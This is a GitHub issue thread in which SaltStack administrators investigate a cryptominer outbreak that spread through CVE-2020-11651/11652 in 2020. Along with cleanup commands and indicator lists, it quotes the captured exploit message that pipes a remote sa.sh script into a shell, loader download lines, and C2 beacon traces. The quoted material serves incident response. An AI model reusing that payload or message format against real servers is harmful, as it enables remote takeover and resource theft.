Description
All of my servers with salt-minion installed suddenly started running an unknown program today.
It's /tmp/salt-minions
[root@yunwei ~]# top
top - 10:06:44 up 511 days, 18:39, 3 users, load average: 2.01, 2.02, 1.91
Tasks: 193 total, 1 running, 192 sleeping, 0 stopped, 0 zombie
Cpu(s): 7.2%us, 18.3%sy, 0.0%ni, 74.1%id, 0.4%wa, 0.0%hi, 0.0%si, 0.0%st
Mem: 8060948k total, 7502768k used, 558180k free, 76316k buffers
Swap: 4194300k total, 437368k used, 3756932k free, 188012k cached
PID USER PR NI VIRT RES SHR S %CPU %MEM TIME+ COMMAND
2280 root 20 0 56.0g 541m 1588 S 101.1 6.9 345886:48 tp_core
27061 root 20 0 2797m 1848 1000 S 99.1 0.0 36:02.75 salt-minions
[root@yunwei ~]# ps -ef |grep 27061 | grep -v grep
root 27061 1 89 09:26 ? 00:36:37 /tmp/salt-minions
salt-minion version: 2018.3.2
OS: CentOS release 6.5 (Final)
I have the same issue.
salt-minion -V
Salt Version:
Salt: 3000.1
Dependency Versions:
cffi: Not Installed
cherrypy: Not Installed
dateutil: 2.7.3
docker-py: Not Installed
gitdb: Not Installed
gitpython: Not Installed
Jinja2: 2.10
libgit2: Not Installed
M2Crypto: Not Installed
Mako: Not Installed
msgpack-pure: Not Installed
msgpack-python: 0.5.6
mysql-python: Not Installed
pycparser: Not Installed
pycrypto: 2.6.1
pycryptodome: Not Installed
pygit2: Not Installed
Python: 3.7.3 (default, Dec 20 2019, 18:57:59)
python-gnupg: Not Installed
PyYAML: 3.13
PyZMQ: 17.1.2
smmap: Not Installed
timelib: Not Installed
Tornado: 4.5.3
ZMQ: 4.3.1
System Versions:
dist: debian 10.3
locale: UTF-8
machine: x86_64
release: 4.19.0-8-cloud-amd64
system: Linux
version: debian 10.3
lsb_release -a
No LSB modules are available.
Distributor ID: Debian
Description: Debian GNU/Linux 10 (buster)
Release: 10
Codename: buster
Gents, this is an attack.
Check your firewalls. We've had all firewalls disabled on more than 20 systems. Still working to find out more about the issue.
Appears to be related to CVE-2020-11651 and CVE-2020-11652. A backdoor was also installed via the exploit to /var/tmp/salt-store.
Additional context for those not in the loop can be seen here:
https://gbhackers.com/saltstack-salt/
F
Maybe it is CVE-2020-11651 and CVE-2020-11652, because my salt-master is reachable from the public internet.
Our entire system is being taken down by this. Can anyone tell us the immediate fix, please?
sudo salt -v '*' cmd.run 'ps aux | grep -e "/var/tmp/salt-store\|salt-minions" | grep -v grep | tr -s " " | cut -d " " -f 2 | xargs kill -9'
This did at least something for me
I've also managed to strace the "salt-minions" process and got an IP; I guess it's the attacker's host:
clock_gettime(CLOCK_REALTIME, {1588474770, 745058278}) = 0
clock_gettime(CLOCK_REALTIME, {1588474770, 745079132}) = 0
epoll_wait(6, {}, 1024, 162) = 0
clock_gettime(CLOCK_MONOTONIC, {28866503, 976451307}) = 0
clock_gettime(CLOCK_MONOTONIC, {28866503, 976489118}) = 0
clock_gettime(CLOCK_MONOTONIC, {28866503, 976516591}) = 0
futex(0x9c4384, FUTEX_WAKE_OP_PRIVATE, 1, 1, 0x9c4380, {FUTEX_OP_SET, 0, FUTEX_OP_CMP_GT, 1}) = 1
futex(0x9c4340, FUTEX_WAKE_PRIVATE, 1) = 1
epoll_wait(6, {{EPOLLIN, {u32=9, u64=9}}}, 1024, 338) = 1
clock_gettime(CLOCK_MONOTONIC, {28866503, 976644019}) = 0
read(9, "1\0\0\0\0\0\0\0", 1024) = 8
clock_gettime(CLOCK_MONOTONIC, {28866503, 976722525}) = 0
socket(PF_INET, SOCK_STREAM|SOCK_CLOEXEC|SOCK_NONBLOCK, IPPROTO_IP) = 89
setsockopt(89, SOL_TCP, TCP_NODELAY, [1], 4) = 0
setsockopt(89, SOL_SOCKET, SO_KEEPALIVE, [1], 4) = 0
setsockopt(89, SOL_TCP, TCP_KEEPIDLE, [60], 4) = 0
connect(89, {sa_family=AF_INET, sin_port=htons(80), sin_addr=inet_addr("193.33.87.231")}, 16) = -1 EINPROGRESS (Operation now in progress)
clock_gettime(CLOCK_MONOTONIC, {28866503, 976922034}) = 0
epoll_ctl(6, EPOLL_CTL_ADD, 89, {EPOLLOUT, {u32=89, u64=89}}) = 0
epoll_wait(6, {}, 1024, 338) = 0
clock_gettime(CLOCK_MONOTONIC, {28866504, 315460999}) = 0
kill -9 $(pgrep salt-minions)
kill -9 $(pgrep salt-store)
193.33.87.231
Russian IP
I saw an example out there that was an AWS server (52.8.126.80)
A scan revealed over 6,000 instances of this service exposed to the public Internet. Getting all of these installs updated may prove a challenge as we expect that not all have been configured to automatically update the salt software packages.
To aid in detecting attacks against vulnerable salt masters, the following information is provided.
Exploitation of the authentication vulnerabilities will result in the ASCII strings "_prep_auth_info" or "_send_pub" appearing in data sent to the request server port (default 4506). These strings should not appear in normal, benign, traffic.
Published messages to minions are called "jobs" and will be saved on the master (default path /var/cache/salt/master/jobs/). These saved jobs can be audited for malicious content or job ids ("jids") that look out of the ordinary. Lack of suspicious jobs should not be interpreted as absence of exploitation however.
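If you want to sweep your own job cache for these markers, something like the following is a starting point (a sketch only; it assumes the default cachedir of /var/cache/salt/master/jobs/, and the grep patterns are just the indicators mentioned here, not a complete IOC list):
```
# List recent jobs, newest last, and flag any cached job data containing the
# exploit markers or a cmd.run payload that pulls a remote script.
ls -ltr /var/cache/salt/master/jobs/
grep -rlaE "_send_pub|_prep_auth_info" /var/cache/salt/master/jobs/ 2>/dev/null
grep -rlaE "curl -s|wget -q -O" /var/cache/salt/master/jobs/ 2>/dev/null
```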
Seems like it's better to stop salt-masters for a while
Stopping salt masters does not stop the processes from running. Also, can we expect that the exploiters have had root access to every minion?
Been affected :(. I've done the following: stopped all Salt masters, and ran the following:
kill -9 $(pgrep salt-minion)
kill -9 $(pgrep salt-minions)
kill -9 $(pgrep salt-store)
rm /tmp/salt-minions
rm /var/tmp/salt-store
Not sure if this is enough at the moment
YOU MUST UPDATE YOUR MASTER(S) IMMEDIATELY
Important references:
- https://github.com/saltstack/community/blob/master/doc/Community-Message.pdf
- https://docs.saltstack.com/en/latest/topics/releases/3000.2.html
- https://docs.saltstack.com/en/latest/topics/releases/2019.2.4.html
- https://labs.f-secure.com/advisories/saltstack-authorization-bypass
- https://threatpost.com/salt-bugs-full-rce-root-cloud-servers/155383/
Disconnect them from the internet ASAP, perform the necessary updates. There are also backports for older versions of Salt:
- "There are also now official 2016.x and 2017.x patches provided by SaltStack via the same location as the other patches."
Seems the attack started a couple of hours ago. I would add:
We got the same issue and we followed the above which remediated it. Thank you all for giving the solution.
In our experience, we had one job that was executed that did the following on each server according to the logs:
Firewall stopped and disabled on system startup
kernel.nmi_watchdog = 0
userdel: user 'akay' does not exist
userdel: user 'vfinder' does not exist
chattr: No such file or directory while trying to stat /root/.ssh/authorized_keys
grep: Trailing backslash
grep: write error: Broken pipe
log_rot: no process found
chattr: No such file or directory while trying to stat /etc/ld.so.preload
rm: cannot remove '/opt/atlassian/confluence/bin/1.sh': No such file or directory
rm: cannot remove '/opt/atlassian/confluence/bin/1.sh.1': No such file or directory
rm: cannot remove '/opt/atlassian/confluence/bin/1.sh.2': No such file or directory
rm: cannot remove '/opt/atlassian/confluence/bin/1.sh.3': No such file or directory
rm: cannot remove '/opt/atlassian/confluence/bin/3.sh': No such file or directory
rm: cannot remove '/opt/atlassian/confluence/bin/3.sh.1': No such file or directory
rm: cannot remove '/opt/atlassian/confluence/bin/3.sh.2': No such file or directory
rm: cannot remove '/opt/atlassian/confluence/bin/3.sh.3': No such file or directory
rm: cannot remove '/var/tmp/lib': No such file or directory
rm: cannot remove '/var/tmp/.lib': No such file or directory
chattr: No such file or directory while trying to stat /tmp/lok
chmod: cannot access '/tmp/lok': No such file or directory
sh: 484: docker: not found
sh: 485: docker: not found
sh: 486: docker: not found
sh: 487: docker: not found
sh: 488: docker: not found
sh: 489: docker: not found
sh: 490: docker: not found
sh: 491: docker: not found
sh: 492: docker: not found
sh: 493: docker: not found
sh: 494: docker: not found
sh: 495: docker: not found
sh: 496: docker: not found
sh: 497: docker: not found
sh: 498: docker: not found
sh: 499: docker: not found
sh: 500: docker: not found
sh: 501: docker: not found
sh: 502: docker: not found
sh: 503: docker: not found
sh: 504: docker: not found
sh: 505: docker: not found
sh: 506: setenforce: not found
apparmor.service is not a native service, redirecting to systemd-sysv-install
Executing /lib/systemd/systemd-sysv-install disable apparmor
insserv: warning: current start runlevel(s) (empty) of script `apparmor' overrides LSB defaults (S).
insserv: warning: current stop runlevel(s) (S) of script `apparmor' overrides LSB defaults (empty).
Failed to stop aliyun.service.service: Unit aliyun.service.service not loaded.
Failed to execute operation: No such file or directory
P NOT EXISTS
md5sum: /var/tmp/salt-store: No such file or directory
salt-store wrong
--2020-05-02 20:10:27-- https://bitbucket.org/samk12dd/git/raw/master/salt-store
Resolving bitbucket.org (bitbucket.org)... 18.205.93.1, 18.205.93.2, 18.205.93.0, ...
Connecting to bitbucket.org (bitbucket.org)|18.205.93.1|:443... connected.
HTTP request sent, awaiting response... 200 OK
Length: 16687104 (16M) [application/octet-stream]
Saving to: '/var/tmp/salt-store'
2020-05-02 20:10:40 (1.27 MB/s) - '/var/tmp/salt-store' saved [16687104/16687104]
8ec3385e20d6d9a88bc95831783beaeb
salt-store OK
salt-minions -> https://github.com/xmrig/xmrig
Same thing on my servers.
Any compromised minion is toast I'm guessing. /tmp/salt-minions is just compiled xmrig? Anyone have any hints for cleanup?
[root@xiaopgg_2 ~]# /tmp/salt-minions -h
Usage: xmrig [OPTIONS]
Network:
-o, --url=URL URL of mining server
-a, --algo=ALGO mining algorithm https://xmrig.com/docs/algorithms
We are investigating salt-store (loader: hxxp://217.12.210.192/salt-store, hxxps://bitbucket.org/samk12dd/git/raw/master/salt-store) and you should do the same, not the salt-minions (miner)!
VT salt-store: https://www.virustotal.com/gui/file/9fbb49edad10ad9d096b548e801c39c47b74190e8745f680d3e3bcd9b456aafc/detection
What we know right now:
- (!) Firewall rules are cleaned up, stopped and disabled
- (!) Changes are made in /var/spool/cron/root
- Hardcoded IP 193.33.87.231 should be blocked on all servers via iptables/firewalld
- NMI watchdog is disabled via sysctl
- AppArmor is disabled as well
- Nginx is stopped
- Tries to brute-force Redis (redis_brH9, main.redisBrute)
- Loader matches https://ironnet.com/blog/malware-analysis-nspps-a-go-rat-backdoor/ https://gyazo.com/d5b8e2df6838ab452fc8a51374dd3a86
Cleanup on minions:
kill -9 $(pgrep salt-minions)
kill -9 $(pgrep salt-store)
rm -f /tmp/salt-minions
rm -f /var/tmp/salt-store
sed -i '/kernel.nmi_watchdog/d' /etc/sysctl.conf
systemctl restart firewalld || /etc/init.d/iptables restart
On the master:
yum update salt-master
systemctl restart salt-master
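If you want to push the IP block out via salt itself (from an already patched and restarted master), a minimal sketch assuming plain iptables; adapt for firewalld/nftables as needed:
```
sudo salt -v '*' cmd.run 'iptables -I INPUT -s 193.33.87.231 -j DROP; iptables -I OUTPUT -d 193.33.87.231 -j DROP'
```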
We have the same problem. The program shut down all of our services, including nginx and redis.
It enables hugepages.
Probably wise to change your passwords if you've been logging into root.
Here's what my salt-store tried to run:
/usr/sbin/sh -c pkill -f salt-minions
/usr/sbin/sh -c chmod +x /tmp/salt-minions
/usr/sbin/sh -c /tmp/salt-minions &
(The last 2 lines execute in a loop until it can detect the miner is running)
Method of detection: spun up a docker container, replaced /bin/sh
with a script which logs all run commands to a tmpfile.
Dockerfile:
FROM archlinux
ADD salt-store .
ADD hello.sh .
RUN chmod +x salt-store
RUN chmod +x hello.sh
RUN cp /bin/sh /bin/shh
CMD /bin/bash
hello.sh:
#!/bin/bash
read -r line
/bin/echo "$0 $*" >> /log.txt
/bin/bash -c "$*"
Build container, spin up, run "mv /hello.sh /bin/sh", run "./salt-store", wait 2 minutes, cat log.txt
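Spelled out as commands, the steps above look roughly like this (a sketch; the image name is made up, and obviously only do this in an isolated, throwaway VM):
```
docker build -t salt-store-sandbox .
docker run --rm -it salt-store-sandbox
# inside the container:
mv /hello.sh /bin/sh
./salt-store &
sleep 120
cat /log.txt
```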
salt-store also auto-downloads the salt-minions binary to /tmp/salt-minions; not via a shell script, it uses Go's built-in functionality.
It also stopped and disabled Docker services.
Spent few moments thinking Docker ports stopped working because of disabled firewall rules, and was trying to configure iptables forwarding before noticing Docker was disabled. :facepalm:
Yes. Stops Confluence, webservers, aliyun, redis, docker, basically anything CPU intensive so he can steal all your resources for his miner :)
Also creates/modifies /etc/selinux/config to:
SELINUX=disabled
Modifies /root/.wget-hsts as well
Modifies root's crontab /var/spool/cron/crontabs/root (in my case with no suspicious entries)
I've reported the bitbucket repo to atlassian as a malware distribution point.
Also found the file /etc/salt/minion.d/_schedule.conf:
schedule:
__mine_interval: {enabled: true, function: mine.update, jid_include: true, maxrunning: 2,
minutes: 60, return_job: false, run_on_start: true}
But I found this file is generated by the salt minion itself, so never mind.
I got hit a few hours ago and they hit a host with snoopy running if anyone is interested in what commands they're running in their payload. Looks like they also knock out /var/log/syslog, set kernel.nmi_watchdog=0 in /etc/sysctl.conf, and disable apparmor in systemd.
Edit: Still going through the lines, but it looks like they also knock out ufw and flush all the chains
@justinimn you are a godsend. Thank you!
Update: Was able to search some of the strings from the snoopy output.
Here:
https://xorl.wordpress.com/2017/12/13/the-kworker-linux-cryptominer-malware/
@taigrr My pleasure
Funny, they even clean the system of any other miners if running. :smile:
@Avasz Hey can't leave any coins on the table right lol
Except they just delete the wallets instead of trying to take them. /shrug
loader: hxxp://217.12.210.192/salt-store
Seems to be Ukrainian IP, related to itldc
It is not pingable any more, and I can not curl -s 217.12.210.192/sa.sh
So I suppose that at least one point of attack was disabled (by itldc or someone else)
Checked ping from 191 different IPs, no ping
@aTastyCookie did you get a copy of 217.12.210.192/sa.sh? We need that to dig into its behavior.
Bunch more IPs:
144.217.129.111
185.17.123.206
185.221.153.85
185.255.178.195
91.215.152.69
salt-store IPs I see mentioned:
252.5.4.32
5.4.52.5
4.62.5.4
72.5.4.82
0.0.0.0
2.5.4.102
5.4.112.5
127.0.0.1
47.65.90.240
185.61.7.8
67.205.161.58
104.248.3.165
1.4.1.1
1.4.1.1
1.4.3.1
1.4.4.1
1.4.6.1
1.4.7.1
1.4.8.1
1.4.9.1
1.4.9.1
1.4.10.1
1.4.11.1
1.4.12.1
1.4.12.1
1.4.13.1
1.4.14.1
1.4.14.1
1.4.14.2
1.4.14.2
1.2.1.1
1.2.2.1
1.2.3.1
1.2.3.1
1.2.4.1
1.2.4.1
1.2.6.1
1.2.8.1
1.1.1.1
1.1.1.1
1.1.1.1
1.1.2.1
1.1.3.1
1.1.3.1
1.2.1.1
1.2.2.1
1.2.2.1
(Note: this list was generated by strings salt-store | grep -E -o "([0-9]{1,3}[\.]){3}[0-9]{1,3}")
104.248.4.162
107.174.47.156
107.174.47.181
108.174.197.76
121.42.151.137
140.82.52.87
144.217.45.45
158.69.133.18
176.31.6.16
181.214.87.241
185.181.10.234
185.193.127.115
185.71.65.238
188.209.49.54
192.236.161.6
200.68.17.196
217.12.210.192
3.215.110.66
45.76.122.92
46.243.253.15
51.15.56.161
51.38.191.178
51.38.203.146
83.220.169.247
88.99.242.92
89.35.39.78
In case these help, these are from the sa.sh file:
$WGET $DIR/salt-store http://217.12.210.192/salt-store
crontab -l | sed '/185.181.10.234/d' | crontab -
crontab -l | sed '/3.215.110.66.one/d' | crontab -
netstat -anp | grep 140.82.52.87 | awk '{print $7}' | awk -F'[/]' '{print $1}' | xargs -I % kill -9 %
netstat -anp | grep 185.71.65.238 | awk '{print $7}' | awk -F'[/]' '{print $1}' | xargs -I % kill -9 %
netstat -antp | grep '108.174.197.76' | grep 'ESTABLISHED\|SYN_SENT' | awk '{print $7}' | sed -e "s/\/.*//g" | xargs -I % kill -9 %
netstat -antp | grep '176.31.6.16' | grep 'ESTABLISHED\|SYN_SENT' | awk '{print $7}' | sed -e "s/\/.*//g" | xargs -I % kill -9 %
netstat -antp | grep '192.236.161.6' | grep 'ESTABLISHED\|SYN_SENT' | awk '{print $7}' | sed -e "s/\/.*//g" | xargs -I % kill -9 %
netstat -antp | grep '46.243.253.15' | grep 'ESTABLISHED\|SYN_SENT' | awk '{print $7}' | sed -e "s/\/.*//g" | xargs -I % kill -9 %
netstat -antp | grep '88.99.242.92' | grep 'ESTABLISHED\|SYN_SENT' | awk '{print $7}' | sed -e "s/\/.*//g" | xargs -I % kill -9 %
pgrep -f 181.214.87.241 | xargs -I % kill -9 %
pgrep -f 188.209.49.54 | xargs -I % kill -9 %
pgrep -f 200.68.17.196 | xargs -I % kill -9 %
pkill -f 121.42.151.137
pkill -f 185.193.127.115
ps aux | grep -v grep | grep '104.248.4.162' | awk '{print $2}' | xargs -I % kill -9 %
ps aux | grep -v grep | grep '107.174.47.156' | awk '{print $2}' | xargs -I % kill -9 %
ps aux | grep -v grep | grep '107.174.47.181' | awk '{print $2}' | xargs -I % kill -9 %
ps aux | grep -v grep | grep '144.217.45.45' | awk '{print $2}' | xargs -I % kill -9 %
ps aux | grep -v grep | grep "158.69.133.18:8220" | awk '{print $2}' | xargs -I % kill -9 %
ps aux | grep -v grep | grep '176.31.6.16' | awk '{print $2}' | xargs -I % kill -9 %
ps aux | grep -v grep | grep '45.76.122.92' | awk '{print $2}' | xargs -I % kill -9 %
ps aux | grep -v grep | grep '51.15.56.161' | awk '{print $2}' | xargs -I % kill -9 %
ps aux | grep -v grep | grep '51.38.191.178' | awk '{print $2}' | xargs -I % kill -9 %
ps aux | grep -v grep | grep '51.38.203.146' | awk '{print $2}' | xargs -I % kill -9 %
ps aux | grep -v grep | grep '83.220.169.247' | awk '{print $2}' | xargs -I % kill -9 %
ps aux | grep -v grep | grep '89.35.39.78' | awk '{print $2}' | xargs -I % kill -9 %
Contacted the abuse team for 193.33.87.231 (by chance we're hosted by the same company that owns this AS); it's one of their clients and they're looking into it.
My bet it's a hacked VPS.
Can we see who added this repo?
https://bitbucket.org/samk12dd/git/src/master/
@onewesong I contacted atlassian over 2 hours ago. Will report back once they respond. So far, nothing.
Edit: 9 hours later and still no response.
Edit: 13 hours. Sheesh. Guess I won't hear back until Monday.
I can confirm this is being delivered via the new cve exploiting exposed port 4506 on salt masters.
{
  "enc": "clear",
  "load": {
    "arg": [
      "(curl -s 217.12.210.192/sa.sh||wget -q -O- 217.12.210.192/sa.sh)|sh"
    ],
    "cmd": "_send_pub",
    "fun": "cmd.run",
    "jid": "15884696218711903731",
    "kwargs": {
      "show_jid": false,
      "show_timeout": true
    },
    "ret": "",
    "tgt": "*",
    "tgt_type": "glob",
    "user": "root"
  }
}
This thread has been amazing - my monitoring was going crazy; Slack messages, text messages, emails - it was screaming for help. Thanks to you guys, I've been successful in (1) upgrading my salt-master (I was on a 2018 version) and (2) identifying that it's the same issue I was plagued with. So thank you very much for the information thus far.
I'm nowhere near the sysadmin that you guys are, but I have 17 servers that were affected. If there's anything I can dig up to help the investigation just let me know and I'd be more than happy to pitch in with data.
Additionally, I'm in AWS with everything. Right now 4505 and 4506 are both open to the world; I'm guessing despite upgrading salt, these ports should be closed to the world; Is it only the minions that need access to them or is there something else that needs access too?
Now i'm off to figure out how to upgrade the minions on the servers.
@jblac Don't trust a compromised system. Reinstall is the only safe thing.
You should even consider that any data on the server may have leaked.
I've made backports for the CVE patches, see https://github.com/rossengeorgiev/salt-security-backports. Salt masters should not be accessible via the public internet. Or at the very least should be heavily firewalled.
I’m a little concerned about some of the victim blaming such as “use a firewall” since the official documentation specifically states to open up the firewall for the TCP ports. Sure, experienced admins will know to wall up your garden, but novice admins do not have such experiences yet.
FWIW
2406 write(7, "GET /h HTTP/1.1\r\nHost: 185.221.153.85\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36\r\nArch: amd64\r\nCores: 1\r\nMem: 489\r\nOs: linux\r\nOsname: ubuntu\r\nOsversion: 14.04\r\nRoot: false\r\nUuid: 2e10f8e9-aa42-4223-59b1-9c1038862c25\r\nVersion: 30\r\nAccept-Encoding: gzip\r\n\r\n", 341) = 341
salt-store tries to push some metadata about the machine to its C2 server (or some minion of it).
Edit: and it uses some kind of JSON-RPC to send keepalives.
/var/cache/salt/master/jobs# ls -ltrR
Will show which minions it connected to.
This will be useful for cleanup.
Updated salt-master, but miner jobs are still spawning on minions even after killing/deleting them. Any hint?
There is likely some sort of persistence established. The best course is to restore a backup from before the breach, or rebuild the server. If that's not possible, shut down the salt-minion and try to find what is relaunching the miners:
- Identify the IP the miner is talking to (e.g. with iftop), then apply a firewall rule to block traffic to/from that IP.
- Check /var/spool/cron and /etc/cron.{d,daily,weekly,monthly}/
- Check /usr/lib/systemd/system and /etc/systemd/system
- Check /etc/init.d
- Check /root/.bashrc and /root/.bash_profile
- Use grep to search for files containing that IP across the entire file system
There are many other possibilities, and you can never be 100% certain you've scrubbed all of the malicious code.
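As a rough starting point (and only that), a sweep like this checks the locations above for the indicators mentioned in this thread; treat any hit as a reason to rebuild rather than proof of a clean box:
```
# Grep common persistence locations for the filenames and the hardcoded IP
# reported in this thread. Extend the pattern list with your own findings.
IOC='salt-store|salt-minions|193\.33\.87\.231'
grep -RHEa "$IOC" /var/spool/cron /etc/cron.d /etc/cron.daily /etc/cron.weekly \
    /etc/cron.monthly /etc/systemd/system /usr/lib/systemd/system /etc/init.d \
    /root/.bashrc /root/.bash_profile 2>/dev/null
```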
Switching to salt-ssh and removing salt-master and salt-minions also helps greatly :)
FYI, after disabling the minion service and rebooting, no more miner processes spawned. On my side, nothing was left after a reboot (as long as the minion is disabled, of course). I'll re-enable the service on a test machine and see if the patched master solved it.
It's not proof, just a heuristic: I diffed the filesystem (including the bootloader) of my sandbox VM before and after I ran salt-store, and I haven't found any persistence mechanism.
This is the complete list of modified files by the malware:
/run/lock/linux.lock
/tmp/.ICEd-unix
/tmp/.ICEd-unix/346542842
/tmp/.ICEd-unix/uuid
/tmp/salt-minions
/var/tmp/.ICEd-unix
Probably noteworthy: I killed / restarted the process itself and its subprocesses to see if the binary behaves differently. However, salt-store always just restarted its miner child process.
Still, they may use VM detection and run different code branches in different environments. The sysctl patch was done by the sa.sh bootstrap script, so it's not listed here. Since sa.sh can be seen as source code in this thread, I only focused on analyzing salt-store.
I haven't seen any persistence mechanisms in sa.sh either.
I would still double check everything, if rebuild or backup restore is not possible, as this miner may not be the only attack.
I did a grep -r confluence . in /var/cache/salt/master/jobs to check which clients executed the sa.sh script (this may be a false positive on Confluence servers, but not all servers run Confluence, I guess). For active salt minions I'd run salt-key -L.
If your master is not also a minion, the master itself is not compromised by this vulnerability. Additionally, all commands executed on minions are still logged on the master by default, so it should be possible to track all actions made via the salt vulnerability itself. This obviously excludes modifications by any programs salt has side-loaded onto the machine, which most likely run with root privileges (like sa.sh / salt-minions).
I've been digging through the salt-miner-snoopy-log.txt that was posted above:
Elements in that log file & loader script found elsewhere that may provide some additional insight into the underlying behavior:
https://tolisec.com/yarn-botnet/
https://zero.bs/how-an-botnet-infected-confluence-server-looks-like.html
https://xn--blgg-hra.no/2017/04/covert-channels-hiding-shell-scripts-in-png-files/
https://gist.github.com/OmarTrigui/8ba857c6a9a91724a7eb0cfdd040f50d
https://s.tencent.com/research/report/975.html
Don't forget to restart the salt master as well.
For some reason, on one of my instances, killing all salt-minions & salt-store processes as well as deleting those files doesn't seem to be working. The salt-minions process starts again within about 2 minutes of killing and deleting it.
Checked cron, init, systemd, bashrc, rc.local; nothing found. Still digging around, will update if anything worthwhile is found.
This is something I was worried about. The salt-store binary is capable of self-updating. It's possible there is additional persistence behavior now that wasn't there last night even. Can you md5 your binary?
Update: confirmed! The bitbucket repo force-pushed a new binary to the repo. It's now called "salt-storer" instead of salt-store. This was done 3 hours ago.
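To compare binaries across a fleet from a (patched and restarted) master, something like this should do; the paths are just the drop locations reported in this thread and won't all exist on every minion:
```
sudo salt -v '*' cmd.run 'md5sum /var/tmp/salt-store /tmp/salt-minions /usr/bin/salt-store 2>/dev/null'
```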
I ran the below on each of the servers as suggested above and then rebooted each box. (About 240 of them!) I am not seeing any more spawning after this.
kill -9 $(pgrep salt-minions)
kill -9 $(pgrep salt-store)
rm -f /tmp/salt-minions
rm -f /var/tmp/salt-store
sed -i '/kernel.nmi_watchdog/d' /etc/sysctl.conf
systemctl restart firewalld || /etc/init.d/iptables restart
Before I did that, I turned off my salt-master. What is the safest way to turn the master back on and patch it? It is a VPS that has internet connectivity. What is the best procedure to patch the master?
Update 1: Not much, but this:
root@myserver:/tmp/.ICEd-unix/bak# cat 328909204 && echo
25391
root@myserver:/tmp/.ICEd-unix/bak# ps ax | grep 25391
25391 ? Ssl 4:51 /tmp/salt-minions
25759 pts/5 S+ 0:00 grep 25391
root@myserver:/tmp/.ICEd-unix/bak#
So what's happening here is that, if I kill the salt-minions process, after about 2 minutes a file gets written inside the .ICEd-unix folder. The content of that file is a number, which is the PID of the parent salt-minions process, and that file gets deleted as soon as the salt-minions process starts. I had to loop cp to get that file copied from the .ICEd-unix folder to .ICEd-unix/bak, so please ignore that bak/.
Did you update and restart your salt-master? Could it be kicking it off again?
Updates to the malware continue to go out. This thread may now contain outdated hints and help.
Oh yes. It's happening after updating and restarting salt-master.
```
root@00:/var/cache/salt# salt --version
salt 3000.2
root@00:/var/cache/salt# systemctl status salt-master
● salt-master.service - The Salt Master Server
Loaded: loaded (/lib/systemd/system/salt-master.service; enabled; vendor preset: enabled)
Active: active (running) since Sun 2020-05-03 21:10:31 +0545; 1h 11min ago
Docs: man:salt-master(1)
file:///usr/share/doc/salt/html/contents.html
https://docs.saltstack.com/en/latest/contents.html
Main PID: 19783 (salt-master)
Tasks: 34 (limit: 4915)
Memory: 279.8M
CGroup: /system.slice/salt-master.service
├─19783 /usr/bin/python3 /usr/bin/salt-master
------ truncated -----------
May 03 21:10:31 00 systemd[1]: Stopped The Salt Master Server.
May 03 21:10:31 00 systemd[1]: Starting The Salt Master Server...
May 03 21:10:31 00 systemd[1]: Started The Salt Master Server.
```
And it's happening even after I have salt-master stopped. Tested just now, double checked by stopping salt-master.
@Avasz Can you tree your processes and see what the parent process is? And what's the md5sum of your salt-store binary? I can run it in a container and see what other files it might touch.
@taigrr
Parent process: /sbin/init :open_mouth:
I don't have the /var/tmp/salt-store binary anymore.
@Avasz this thing has morphed quite a bit. I'm starting to think a GitHub issue isn't the best way to troubleshoot anymore.
I have both binaries:
md5sum /tmp/salt-minions
a28ded80d7ab5c69d6ccde4602eef861 /tmp/salt-minions
md5sum /var/tmp/salt-store
8ec3385e20d6d9a88bc95831783beaeb /var/tmp/salt-store
I was also seeing just one of my machines established a persistence for salt-minions without salt-store(r).
I wrote a quick bash while-lsof to catch it, and a randomly-named process was writing out the file.
I just rebooted that machine. If it re-establishes, I'm going to write a quick script to send a SIGSTOP (and/or hook gdb) when lsof picks it up again.
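For anyone who wants to try the same trick, a minimal sketch of such a watch loop (assuming the PID file shows up under /tmp/.ICEd-unix as described above); it freezes the writer with SIGSTOP instead of killing it so it can be inspected:
```
#!/bin/bash
# Poll for any process holding a file open under the malicious directory,
# print it, and suspend it for later inspection (gdb, /proc/<pid>/exe, etc.).
while true; do
  lsof +D /tmp/.ICEd-unix 2>/dev/null | awk 'NR>1 {print $1, $2}' | sort -u |
  while read -r name pid; do
    echo "caught: $name (pid $pid)"
    kill -STOP "$pid"
  done
  sleep 1
done
```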
@astronouth7303 What is the name of that random process? Is it "vXrSv"?
It is always that and salt-minions in my case.
salt-mini 4692 root 1u REG 8,1 4 667325 104066568
vXrSv 7619 root 6u REG 8,1 4 667325 104066568
@taigrr yeah.. this issue doesn't seem to be a good place to discuss anymore. Any other alternative communication channel? Telegram? Slack? :)
Nope, mine was XrqMv
It doesn't seem to be coming back after reboot.
SaltStack has a slack, which seems like the obvious choice?
Just rebooted and it stopped coming back.
Anybody want to join the slack, https://saltstackcommunity.herokuapp.com/
I've created a dedicated channel (salt-store-miner-public). Send username to be added.
@Avasz Be careful. I don't believe it's gone.
@taigrr Would like to join the conversation.
This whole "don't have your salt master exposed to the internet" thing has me annoyed.
The whole point of salt is to manage boxes all over the place.
I manage around 500 machines. Most of them are behind the firewalls of incompetent admins who have spent hours in the past trying to set up port forwards when salt-minion crashed so I could access the box again.
I'm about to test binding salt-master to localhost and salt-minion to localhost and then setting up spiped to wrap the traffic...
I would like to be added
I'd also be happy to be invited, thanks.
Me too please
Me too please
Me too please
Username on slack? Can't find you, @nbuchwitz
Guys, please give me your slack names. You must already be a member of the slack group I posted the link to above. Having trouble finding some of you. You can also DM me through slack (Tai Groot) to avoid cluttering this issue.
I used these commands to remove the binaries and stop the processes on all hosts. The second one is from @opiumfor, above.
salt -v '*' cmd.run 'rm /var/tmp/salt-store && rm /tmp/salt-minions'
salt -v '*' cmd.run 'ps aux | grep -e "/var/tmp/salt-store\|salt-minions" | grep -v grep | tr -s " " | cut -d " " -f 2 | xargs kill -9'
This whole "don't have your salt master exposed to the internet" thing has me annoyed.
The whole point of salt is to manage boxes all over the place.
I manage around 500 machines. Most of them are behind the firewalls of incompetent admins who have spent hours in the past trying to set up port forwards when salt-minion crashed so I could access the box again.
I do agree with this.
I also have a similar use case: 1000+ devices, all in various places and various networks. VPN & controlled access to ports 4505 & 4506 is not possible at all. Salt was the perfect tool.
Very quick and dirty howto to wrap salt traffic in spiped for encryption:
https://gist.github.com/darkpixel/51930435c27724d2b41daa8c6bded673
I'm going to work on a few salt states to automatically push these changes out to my minions and I will publish those as well.
@taigrr I would like to be added to slack as well. Thanks! user: int-adam
